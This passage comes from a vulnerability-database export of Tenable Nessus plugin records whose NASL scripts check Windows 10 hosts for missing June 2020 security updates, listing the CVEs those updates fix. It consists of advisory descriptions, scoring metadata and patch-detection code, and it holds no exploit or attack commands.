(CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. 
(CVE-2020-1244)\");\n # https://support.microsoft.com/en-us/help/4561608/windows-10-update-kb4561608\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42cd5594\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561608.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561608'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561608])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:26", "description": "The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
(CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302, CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. 
(CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. 
(CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. 
Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561621: Windows 10 Version 1803 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", 
"CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1274", "CVE-2020-1276", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561621.NASL", "href": "https://www.tenable.com/plugins/nessus/137259", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137259);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n 
\"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1274\",\n \"CVE-2020-1276\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561621\");\n script_xref(name:\"MSFT\", value:\"MS20-4561621\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561621: Windows 10 Version 1803 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561621.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. 
An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. 
An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302,\n CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. 
An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. 
An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. 
(CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause 